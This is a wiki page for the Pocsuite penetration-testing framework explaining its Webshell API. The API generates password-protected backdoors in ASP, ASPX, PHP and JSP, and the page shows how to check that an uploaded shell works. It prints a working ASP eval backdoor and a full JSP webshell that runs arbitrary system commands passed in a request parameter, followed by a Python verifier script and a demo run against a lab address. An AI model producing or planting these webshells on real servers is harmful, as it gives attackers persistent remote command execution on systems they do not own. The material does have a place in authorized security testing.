Skip to content

How to use the webshell api

Jump to bottom Edit New page
Vex Woo edited this page Jul 14, 2016 · 1 revision

This document talks about how to use webshell api.

How to generate a new shell

To generate a new shell, you need to import the library first. The following is an example of using the library in python interactive shell.

>>> from pocsuite.api.webshell import Webshell
>>> ws = Webshell()
>>> ws.asp()    
('<%eval request("26VXKVZPHplzblhZ")%>', 'Response.Write(Replace("<T>","T","26VXKVZPHplzblhZ"))', '<26VXKVZPHplzblhZ>')

If you want a custom password, ex: "helloworld":

>>> from pocsuite.api.webshell import Webshell
>>> ws = Webshell()
>>> ws.password = "helloworld"   # set a shell password
>>> ws.asp()
  • generate a asp shell, please run ws.asp().
  • generate a aspx shell, please run ws.aspx().
  • generate a php shell, please run ws.php().
  • generate a jsp shell, please run ws.jsp().

ws.asp() can return three items, (backdoor, flag_code, flag_match)

backdoor, flag_code, flag_match = ws.asp()

  • backdoor = '<%eval request("26VXKVZPHplzblhZ")%>'
  • flag_code = 'Response.Write(Replace("<T>","T","26VXKVZPHplzblhZ"))'
  • flag_match = '<26VXKVZPHplzblhZ>'

How to check if a shell is available or not ?

    1. Upload a shell to the remote server.
    1. Send flag_code to the shell.
    1. Match shell response with flag_match.

You can also verify a shell with has_shell, ex:

    def has_shell(self, url, password, flag_code, flag_match):
        """Check if a shell is available.

        param: url, a shell url
        param: password, shell password
        param: flag_code,  let shell execute the code
        param: flag_match, flag
        """
        try:
            resp = requests.post(url, data={password: flag_code}, timeout=15)
            if resp and flag_match in resp.content:
                return True
        except (requests.ConnectionError, requests.Timeout):
            pass

        return False

has_shell has four parameters,

  • url, a backdoor shell url
  • password, a shell password
  • flag_code, execution code (asp, php, or jsp, ...)
  • flag_match, when flag_code is executed, a flag will be used to match the shell.

Demo

If you have a good chance, please upload the backdoor called bk.jsp:

<%@ page import="java.util.*,java.io.*" %><%@ page import="java.io.*"%><%@ page import="java.util.*"%><%String cmd = request.getParameter("helloworld");if (cmd != null && "debug".equals(cmd))    out.println("<T>".replace("T","helloworld"));else if (cmd != null && !"".equals(cmd)){    Process p = Runtime.getRuntime().exec(cmd);    OutputStream os = p.getOutputStream();    InputStream in = p.getInputStream();    DataInputStream dis = new DataInputStream(in);    String disr = dis.readLine();    while ( disr != null)    {        out.println(disr);        disr = dis.readLine();    }}%>

Now, we can create a simple python script to verify the shell.

"""
Copyright (c) 2014-2016 pocsuite developers (https://seebug.org)
See the file 'docs/COPYING' for copying permission
"""

from pocsuite.api.webshell import Webshell


def test_jsp_backdoor():
    # Notice: only check the backdoor created by Webshell class

    # exploit the target, and upload the webshell backdoor
    # ......

    url = raw_input('[*] JSP backdoor-url: ')
    ws = Webshell()
    ws.password = raw_input('[*] backdoor-password: ')
    backdoor, flag_code, flag_match = ws.jsp()

    if ws.has_shell(url, ws.password, flag_code, flag_match):
        print('[+] get shell successfully.')
    else:
        print('[-] wish you good chance next time')


if __name__ == "__main__":
    test_jsp_backdoor()

Run the python script, and input backdoor url and backdoor password.

$ python test_jsp.py
[*] JSP backdoor-url: http://192.168.206.133:8080/bk.jsp
[*] backdoor-password: helloworld
[+] get shell successfully.
Add a custom footer

Pocsuite Wiki Pages

  • Home Welcome to Pocsuite!
Clone this wiki locally